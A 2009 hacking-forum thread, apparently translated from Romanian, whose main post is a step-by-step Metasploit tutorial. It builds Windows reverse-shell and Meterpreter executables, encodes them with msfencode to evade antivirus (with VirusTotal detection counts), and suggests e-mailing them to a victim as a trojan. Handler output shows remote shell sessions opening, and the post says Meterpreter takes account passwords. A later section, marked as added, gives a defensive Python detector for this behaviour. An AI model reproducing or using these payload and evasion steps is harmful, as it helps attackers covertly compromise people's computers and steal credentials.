neox Posted September 12, 2009

video tutorial hack
RapidShare: 1-CLICK Web hosting - Easy Filehosting
Here is the video once more: http://www.fileshare.ro/1581041404.88

TigerSS Posted September 21, 2009

I'm asking too, please re-upload it, 10x!!! The previous one was very instructive.

neox Posted September 22, 2009 (Author)

Guys, tell me a good Romanian host so I can update the Backtrack-hack video, because it expired on RapidShare. I also forgot to show you something. I do this at the start in Backtrack4, right after installation. To have success with Metasploit, so that it does not show up as a virus or as an attack on the victim system, do it like this.

With Metasploit it is possible to create payloads, for example an executable, to get a reverse shell back to the attacker. This is an exe executable file. Meanwhile, virus scanners are a basic part of any system, and therefore it is important that the payload is not recognized as a virus.

How do we make a payload with a reverse shell? Like this: in backtrack 4 we open a console and give the following command. The command is always the part between the dashed lines.

------------------------------------------------------------
/pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 X > payload.exe
------------------------------------------------------------

and the console shows this:

Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 278
Options: LHOST=192.168.1.100

Of course, for the IP you have to give your own IP.

To encode the payload so that it is not detected as a virus, it is passed through msfencode. Choose from the following encoders (mind the rank). Give this command in the same console:

------------------------------------------------------------
/pentest/exploits/framework3/msfencode -l
------------------------------------------------------------

and it shows this:

Framework Encoders
==================

Name                    Rank       Description
----                    ----       -----------
cmd/generic_sh          normal     Generic Shell Variable Substitution Command Encoder
generic/none            normal     The "none" Encoder
mipsbe/longxor          normal     XOR Encoder
mipsle/longxor          normal     XOR Encoder
php/base64              normal     PHP Base64 encoder
ppc/longxor             normal     PPC LongXOR Encoder
ppc/longxor_tag         normal     PPC LongXOR Encoder
sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   great      Polymorphic Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

Now we can create a payload for comparison with the x86/countdown encoder and check it on VirusTotal, and then we will create a payload with the x86/shikata_ga_nai encoder and check it as well.

x86/countdown encoder:

Again in the same console, the following command. It is a single command from one end to the other.

------------------------------------------------------------
/pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/countdown -c 4 -t exe -o payload-countdown.exe
------------------------------------------------------------

and the console shows this:

[*] x86/countdown succeeded with size 297 (iteration=1)
[*] x86/countdown succeeded with size 315 (iteration=2)
[*] x86/countdown succeeded with size 333 (iteration=3)
[*] x86/countdown succeeded with size 351 (iteration=4)

On VirusTotal, 7 of the 40 virus scanners still recognize it as a virus.

x86/shikata_ga_nai encoder:

Again in the console, give this command:

------------------------------------------------------------
/pentest/exploits/framework3/msfpayload windows/shell/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 4 -t exe -o payload-shikata_ga_nai.exe
------------------------------------------------------------

and the console shows this:

[*] x86/shikata_ga_nai succeeded with size 306 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 333 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 360 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 387 (iteration=4)

On VirusTotal only 6 programs recognize it as a virus now.

After various tests with different encoders and different numbers of iterations, it was always recognized by 6 - 9 (out of 40 scanners). The best I managed was for it to be recognized by only 2 antivirus programs, but for that you have to work with ollydbg and it is a lot of work.

It made three exes on the desktop. You can test them to see how they work: either you send them by e-mail, or you use it as a trojan server and send it to the victim, but you can also test on a virtual host.

Payload in Action

This is how you call it, with this command in the console:

------------------------------------------------------------
/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 O
------------------------------------------------------------

and the console shows this:

[*] Please wait while we load the module tree...

Name      Current Setting  Required  Description
----      ---------------  --------  -----------

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  seh              yes       Exit technique: seh, thread, process
LHOST     192.168.1.100    yes       The local address
LPORT     4444             yes       The local port

12:45:55 m1k3-offsec ~ [root]
/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.100 LPORT=4444 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.103:7636)

Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.

E:\payload>

From here you do what you want. It is as simple as that, and you have a shell tunnel from the attacker's internal network, and he has access to the victim's internal network!

Meterpreter connection, and this one takes all the accounts and passwords.

Again in the console, like the one you made with the x86/shikata_ga_nai encoder:

------------------------------------------------------------
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.100 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 3 -t exe -o test/payload-meterpreter-shikata_ga_nai-3encoding.exe
------------------------------------------------------------

and the console shows this:

[*] x86/shikata_ga_nai succeeded with size 306 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 333 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 360 (iteration=3)

12:52:13 m1k3-offsec ~ [root]
/pentest/exploits/framework3/msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Starting the payload handler...
[*] Started reverse handler
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (50 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (87 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.103:7673)

meterpreter > help
...

You do the same thing in framework3 as I did in the backtrack-hack video. For you the standard payload goes into action, and that one is bad. So you navigate in the bt console like this: open a new console, give cd /pentest/exploits/framework3/ and then give the commands I showed above, only the encoder commands, without the payload in action part, and then you too have a good payload that does not cause problems on the victim PC.

But pay attention to the IP that backtrack gives you. For example, you have IP 192.168.1.165, you made the payload, it works for a few days, and then bt changes the IP. The modified payload no longer works, the standard payload works. So pay attention to the IP: either you redo it with the encoder every time the IP changes, or you do it only once and change your IP back yourself.

Sorry for the grammar and the writing, I think I have been writing for an hour.
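
Added example, not part of the original post or of Metasploit: re-encoding changes the file that static scanners inspect, but the windows/shell/reverse_tcp behaviour in the session output above (an outbound TCP connection, then a command shell started by the same process) does not change, so a defender can match on that sequence instead. The event format, field names, PIDs, the 5-second window and all sample events are constructed assumptions.

```python
# Behaviour-based check over constructed process/network telemetry.
SHELLS = {"cmd.exe", "powershell.exe"}
WINDOW = 5.0  # seconds allowed between outbound connect and shell spawn (assumed)

# Constructed sample events (not taken from the original post).
EVENTS = [
    {"t": 10.0, "type": "net", "pid": 1840, "dst": "203.0.113.10", "dport": 443,
     "image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    # A shell started by a process with no prior outbound connection: benign here.
    {"t": 42.0, "type": "proc", "ppid": 1500, "image": r"C:\WINDOWS\system32\cmd.exe"},
    # An unknown executable connects out, then immediately spawns cmd.exe.
    {"t": 100.0, "type": "net", "pid": 2212, "dst": "192.168.1.100", "dport": 4444,
     "image": r"E:\payload\payload-shikata_ga_nai.exe"},
    {"t": 100.4, "type": "proc", "ppid": 2212, "image": r"C:\WINDOWS\system32\cmd.exe"},
]

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def find_reverse_shells(events, window=WINDOW):
    """Alert when a process connects out and spawns a shell within `window` seconds."""
    last_conn = {}  # pid -> most recent outbound connection event
    alerts = []
    for ev in sorted(events, key=lambda e: e["t"]):
        if ev["type"] == "net":
            last_conn[ev["pid"]] = ev
        elif ev["type"] == "proc" and basename(ev["image"]) in SHELLS:
            conn = last_conn.get(ev["ppid"])
            if conn and 0 <= ev["t"] - conn["t"] <= window:
                alerts.append({"pid": ev["ppid"], "image": conn["image"],
                               "dst": conn["dst"], "dport": conn["dport"]})
    return alerts

if __name__ == "__main__":
    for alert in find_reverse_shells(EVENTS):
        print("ALERT", alert)
```

The rule ignores file contents entirely, so it gives the same result for the countdown and shikata_ga_nai variants; the Meterpreter session would need a different behavioural signal, since it does not start cmd.exe on connect.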

daatdraqq Posted September 22, 2009

> Guys, tell me a good Romanian host so I can update the Backtrack-hack video, because it expired on RapidShare. I also forgot to show you something

File Share - Share your files!
Video, Poze, Fisiere, Muzica :: Filebox.ro
Dump - Unlimited file storage

neox Posted September 23, 2009 (Author)

Thanks daatdraqq. If something doesn't work, say so and we'll sort it out.